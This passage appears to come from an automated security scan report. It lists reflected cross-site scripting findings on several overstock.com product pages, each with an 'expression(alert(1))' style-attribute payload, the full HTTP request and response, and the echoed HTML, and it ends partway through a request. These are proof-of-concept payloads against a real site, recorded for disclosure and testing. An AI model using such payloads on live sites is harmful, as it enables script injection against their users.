Path:   /Gifts-Flowers/Universal-Waterproof-Hammock-Back-Seat-Cover/3450019/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13ec0"style%3d"x%3aexpression(alert(1))"e89bccefc7f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 13ec0"style="x:expression(alert(1))"e89bccefc7f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Gifts-Flowers/Universal-Waterproof-Hammock-Back-Seat-Cover/3450019/product.html?13ec0"style%3d"x%3aexpression(alert(1))"e89bccefc7f=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 17:08:15 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 17:08:15 GMT
Pragma: no-cache
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408895139:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=3450019|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 17:08:15 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 17:08:15 GMT; Path=/
Keep-Alive: timeout=5, max=51
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 110383

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j18.overstock.com ssl:false -->


<head>

<title>Un
...[SNIP]...
<input type="hidden" name="13ec0"style="x:expression(alert(1))"e89bccefc7f" value="1"/>
...[SNIP]...

2.117. http://www.overstock.com/Gifts-Flowers/Zack-Zoey-Soft-Red-Dog-Sweatshirt/3906673/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Gifts-Flowers/Zack-Zoey-Soft-Red-Dog-Sweatshirt/3906673/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7251a"style%3d"x%3aexpression(alert(1))"9cd48544d0e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7251a"style="x:expression(alert(1))"9cd48544d0e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Gifts-Flowers/Zack-Zoey-Soft-Red-Dog-Sweatshirt/3906673/product.html?7251a"style%3d"x%3aexpression(alert(1))"9cd48544d0e=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 17:07:48 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 17:07:48 GMT
Pragma: no-cache
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408868406:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=3906673|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 17:07:48 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 17:07:48 GMT; Path=/
Keep-Alive: timeout=5, max=16
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 114905

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j18.overstock.com ssl:false -->


<head>

<title>Za
...[SNIP]...
<input type="hidden" name="7251a"style="x:expression(alert(1))"9cd48544d0e" value="1"/>
...[SNIP]...

2.118. http://www.overstock.com/Health-Beauty/Bare-Escentuals-Crown-Jewels-Makeup-Kit/3930811/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Health-Beauty/Bare-Escentuals-Crown-Jewels-Makeup-Kit/3930811/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 742a2"style%3d"x%3aexpression(alert(1))"7ddfdf958c9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 742a2"style="x:expression(alert(1))"7ddfdf958c9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Health-Beauty/Bare-Escentuals-Crown-Jewels-Makeup-Kit/3930811/product.html?742a2"style%3d"x%3aexpression(alert(1))"7ddfdf958c9=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 17:06:49 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 17:06:49 GMT
Pragma: no-cache
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 17:06:49 GMT; Path=/
Set-Cookie: mxcproclicks=3930811|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 17:06:49 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408809774:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=21
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 107243

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j11.overstock.com ssl:false -->


<head>

<title>Ba
...[SNIP]...
<input type="hidden" name="742a2"style="x:expression(alert(1))"7ddfdf958c9" value="1"/>
...[SNIP]...

2.119. http://www.overstock.com/Health-Beauty/CHI-Air-Pro-Expert-Pink-Breast-Cancer-Awareness-1-inch-Flat-Iron-Combo-Pack/5075179/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Health-Beauty/CHI-Air-Pro-Expert-Pink-Breast-Cancer-Awareness-1-inch-Flat-Iron-Combo-Pack/5075179/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8740e"style%3d"x%3aexpression(alert(1))"f06280582af was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8740e"style="x:expression(alert(1))"f06280582af in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Health-Beauty/CHI-Air-Pro-Expert-Pink-Breast-Cancer-Awareness-1-inch-Flat-Iron-Combo-Pack/5075179/product.html?8740e"style%3d"x%3aexpression(alert(1))"f06280582af=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:02:44 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:02:44 GMT
Pragma: no-cache
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289404964793:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:02:44 GMT; Path=/
Set-Cookie: mxcproclicks=5075179|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:02:44 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Keep-Alive: timeout=5, max=5
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 104199

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j13.overstock.com ssl:false -->


<head>

<title>CH
...[SNIP]...
<input type="hidden" name="8740e"style="x:expression(alert(1))"f06280582af" value="1"/>
...[SNIP]...

2.120. http://www.overstock.com/Health-Beauty/Curve-Vintage-Soul-by-Liz-Claiborne-Womens-3.4-ounce-Eau-de-Parfum-Spray/2869430/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Health-Beauty/Curve-Vintage-Soul-by-Liz-Claiborne-Womens-3.4-ounce-Eau-de-Parfum-Spray/2869430/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c529d"style%3d"x%3aexpression(alert(1))"2dc1a013a42 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c529d"style="x:expression(alert(1))"2dc1a013a42 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Health-Beauty/Curve-Vintage-Soul-by-Liz-Claiborne-Womens-3.4-ounce-Eau-de-Parfum-Spray/2869430/product.html?c529d"style%3d"x%3aexpression(alert(1))"2dc1a013a42=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:02:53 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:02:53 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289404973630:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=2869430|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:02:53 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:02:53 GMT; Path=/
Keep-Alive: timeout=5, max=57
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 109053

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j12.overstock.com ssl:false -->


<head>

<title>Cu
...[SNIP]...
<input type="hidden" name="c529d"style="x:expression(alert(1))"2dc1a013a42" value="1"/>
...[SNIP]...

2.121. http://www.overstock.com/Health-Beauty/Farouk-CHI-1-inch-Beneath-Our-Earth-Styling-Iron-with-2-oz-Organic-Chi-Silk-Oil/4123486/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Health-Beauty/Farouk-CHI-1-inch-Beneath-Our-Earth-Styling-Iron-with-2-oz-Organic-Chi-Silk-Oil/4123486/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 705fb"style%3d"x%3aexpression(alert(1))"5454126871a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 705fb"style="x:expression(alert(1))"5454126871a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Health-Beauty/Farouk-CHI-1-inch-Beneath-Our-Earth-Styling-Iron-with-2-oz-Organic-Chi-Silk-Oil/4123486/product.html?705fb"style%3d"x%3aexpression(alert(1))"5454126871a=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:03:06 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:03:06 GMT
Pragma: no-cache
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:03:06 GMT; Path=/
Set-Cookie: mxcproclicks=4123486|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:03:06 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289404986587:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 110118

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j11.overstock.com ssl:false -->


<head>

<title>Fa
...[SNIP]...
<input type="hidden" name="705fb"style="x:expression(alert(1))"5454126871a" value="1"/>
...[SNIP]...

2.122. http://www.overstock.com/Health-Beauty/Farouk-CHI-Limited-Edition-Guitar-Purple-Hairstyling-Flat-Iron/4061543/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Health-Beauty/Farouk-CHI-Limited-Edition-Guitar-Purple-Hairstyling-Flat-Iron/4061543/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2dd41"style%3d"x%3aexpression(alert(1))"45e65c86e48 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2dd41"style="x:expression(alert(1))"45e65c86e48 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Health-Beauty/Farouk-CHI-Limited-Edition-Guitar-Purple-Hairstyling-Flat-Iron/4061543/product.html?2dd41"style%3d"x%3aexpression(alert(1))"45e65c86e48=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:02:45 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:02:45 GMT
Pragma: no-cache
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289404965520:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=4061543|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:02:45 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:02:45 GMT; Path=/
Keep-Alive: timeout=5, max=81
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 108038

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j18.overstock.com ssl:false -->


<head>

<title>Fa
...[SNIP]...
<input type="hidden" name="2dd41"style="x:expression(alert(1))"45e65c86e48" value="1"/>
...[SNIP]...

2.123. http://www.overstock.com/Health-Beauty/Farouk-CHI-Limited-Edition-Red-Heart-1-inch-Flat-Iron/4565140/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Health-Beauty/Farouk-CHI-Limited-Edition-Red-Heart-1-inch-Flat-Iron/4565140/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf583"style%3d"x%3aexpression(alert(1))"e78249b5e41 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as cf583"style="x:expression(alert(1))"e78249b5e41 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Health-Beauty/Farouk-CHI-Limited-Edition-Red-Heart-1-inch-Flat-Iron/4565140/product.html?cf583"style%3d"x%3aexpression(alert(1))"e78249b5e41=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
